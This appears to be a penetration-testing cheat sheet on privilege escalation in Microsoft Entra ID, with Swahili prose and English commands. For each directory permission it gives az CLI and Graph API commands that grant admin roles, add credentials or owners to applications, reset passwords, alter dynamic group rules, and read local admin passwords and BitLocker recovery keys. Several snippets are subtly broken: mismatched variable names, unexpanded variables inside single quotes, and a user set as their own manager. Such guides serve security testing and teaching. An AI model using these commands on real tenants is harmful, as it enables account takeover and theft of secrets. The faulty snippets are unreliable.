Az - EntraID Privesc

Roles

Role: Privileged Role Administrator

Hiki ni jukumu lenye ruhusa za granular zinazohitajika ili kuweza kupeana majukumu kwa wahusika na kutoa ruhusa zaidi kwa majukumu. Vitendo vyote viwili vinaweza kutumika vibaya ili kupandisha hadhi.

• Assign role to a user:

# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

• Ongeza ruhusa zaidi kwa jukumu:

# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'

Applications

microsoft.directory/applications/credentials/update

Hii inaruhusu mshambuliaji kuongeza akreditif (nenosiri au vyeti) kwa programu zilizopo. Ikiwa programu ina ruhusa za kipaumbele, mshambuliaji anaweza kuthibitisha kama programu hiyo na kupata ruhusa hizo.

# Generate a new password without overwritting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id <appId> --create-cert

microsoft.directory/applications.myOrganization/credentials/update

Hii inaruhusu vitendo sawa na applications/credentials/update, lakini imepangwa kwa programu za directory moja.

az ad app credential reset --id <appId> --append

microsoft.directory/applications/owners/update

Description: Sasisha wamiliki wa programu Abuse Potential: Kwa kujiongeza kama mmiliki, mshambuliaji anaweza kudhibiti programu, ikiwa ni pamoja na akiba na ruhusa.

az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>

Service Principals

microsoft.directory/servicePrincipals/credentials/update

Hii inaruhusu mshambuliaji kuongeza akreditivu kwa huduma zilizopo za huduma. Ikiwa huduma ya huduma ina mamlaka ya juu, mshambuliaji anaweza kuchukua mamlaka hayo.

az ad sp credential reset --id <sp-id> --append

Ikiwa unapata kosa "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." ni kwa sababu haiwezekani kubadilisha mali ya passwordCredentials ya SP na kwanza unahitaji kuifungua. Kwa hiyo unahitaji ruhusa (microsoft.directory/applications/allProperties/update) inayokuruhusu kutekeleza:

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

Hii inaruhusu mshambuliaji kuongeza akidi kwa huduma zilizopo. Ikiwa huduma hiyo ina mamlaka ya juu, mshambuliaji anaweza kuchukua mamlaka hayo.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

Kama ilivyo kwa programu, ruhusa hii inaruhusu kuongeza wamiliki zaidi kwa huduma ya msingi. Kumiliki huduma ya msingi kunaruhusu kudhibiti akidi zake na ruhusa.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

microsoft.directory/servicePrincipals/disable na enable

Ruhusa hizi zinaruhusu kuzima na kuwezesha wahusika wa huduma. Mshambuliaji anaweza kutumia ruhusa hii kuwezesha mhusika wa huduma ambaye anaweza kupata ufikiaji wa namna fulani ili kupandisha hadhi.

Kumbuka kwamba kwa ajili ya mbinu hii mshambuliaji atahitaji ruhusa zaidi ili kuchukua udhibiti wa mhusika wa huduma aliyewezeshwa.

bashCopy code# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

Ruhusa hizi zinaruhusu kuunda na kupata akreditivu za kuingia mara moja ambazo zinaweza kuruhusu ufikiaji wa programu za upande wa tatu.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Makundi

microsoft.directory/groups/allProperties/update

Ruhusa hii inaruhusu kuongeza watumiaji kwenye makundi yenye mamlaka, na kusababisha kupanda kwa mamlaka.

az ad group member add --group <GroupName> --member-id <UserId>

Kumbuka: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu.

microsoft.directory/groups/owners/update

Ruhusa hii inaruhusu kuwa mmiliki wa vikundi. Mmiliki wa kundi anaweza kudhibiti uanachama wa kundi na mipangilio, na hivyo kuongeza mamlaka kwa kundi.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Kumbuka: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu.

microsoft.directory/groups/members/update

Ruhusa hii inaruhusu kuongeza wanachama kwenye kundi. Mshambuliaji anaweza kujiongeza mwenyewe au akaunti mbaya kwenye vikundi vyenye mamlaka ambayo yanaweza kutoa ufikiaji wa juu.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

Ruhusa hii inaruhusu kubadilisha sheria za uanachama katika kundi la dynamic. Mshambuliaji anaweza kubadilisha sheria za dynamic ili kujumuisha mwenyewe katika vikundi vyenye mamlaka bila kuongeza wazi.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Kumbuka: Ruhusa hii inatenga vikundi vya Entra ID vinavyoweza kupewa majukumu.

Privesc za Vikundi vya Kijadi

Inaweza kuwa inawezekana kwa watumiaji kuongeza mamlaka kwa kubadilisha mali zao ili kuongezwa kama wanachama wa vikundi vya kijadi. Kwa maelezo zaidi angalia:

Watumiaji

microsoft.directory/users/password/update

Ruhusa hii inaruhusu kurekebisha nywila kwa watumiaji wasiokuwa wasimamizi, ikiruhusu mshambuliaji mwenye uwezo kuongeza mamlaka kwa watumiaji wengine. Ruhusa hii haiwezi kutolewa kwa majukumu maalum.

az ad user update --id <user-id> --password "kweoifuh.234"

microsoft.directory/users/basic/update

Hii haki inaruhusu kubadilisha mali za mtumiaji. Ni kawaida kukutana na vikundi vya dinamik ambayo vinaongeza watumiaji kulingana na thamani za mali, kwa hivyo, ruhusa hii inaweza kumruhusu mtumiaji kuweka thamani ya mali inayohitajika ili kuwa mwanachama wa kundi maalum la dinamik na kupandisha haki.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Sera za Upatikanaji wa Masharti & Kuepuka MFA

Sera za upatikanaji wa masharti zilizowekwa vibaya zinazohitaji MFA zinaweza kuepukwa, angalia:

Vifaa

microsoft.directory/devices/registeredOwners/update

Ruhusa hii inawawezesha washambuliaji kujitenga kama wamiliki wa vifaa ili kupata udhibiti au upatikanaji wa mipangilio na data maalum za kifaa.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/devices/registeredUsers/update

Ruhusa hii inawawezesha washambuliaji kuunganisha akaunti zao na vifaa ili kupata ufikiaji au kupita sera za usalama.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/deviceLocalCredentials/password/read

Ruhusa hii inawawezesha washambuliaji kusoma mali za akauti za usimamizi wa ndani zilizohifadhiwa kwa vifaa vilivyounganishwa na Microsoft Entra, ikiwa ni pamoja na nenosiri

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

microsoft.directory/bitlockerKeys/key/read

Ruhusa hii inaruhusu kufikia funguo za BitLocker, ambazo zinaweza kumruhusu mshambuliaji kufungua diski, na kuathiri usiri wa data.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Mamlaka Mengine ya Kuvutia (TODO)

• microsoft.directory/applications/permissions/update

• microsoft.directory/servicePrincipals/permissions/update

• microsoft.directory/applications.myOrganization/allProperties/update

• microsoft.directory/applications/allProperties/update

• microsoft.directory/servicePrincipals/appRoleAssignedTo/update

• microsoft.directory/applications/appRoles/update

• microsoft.directory/applications.myOrganization/permissions/update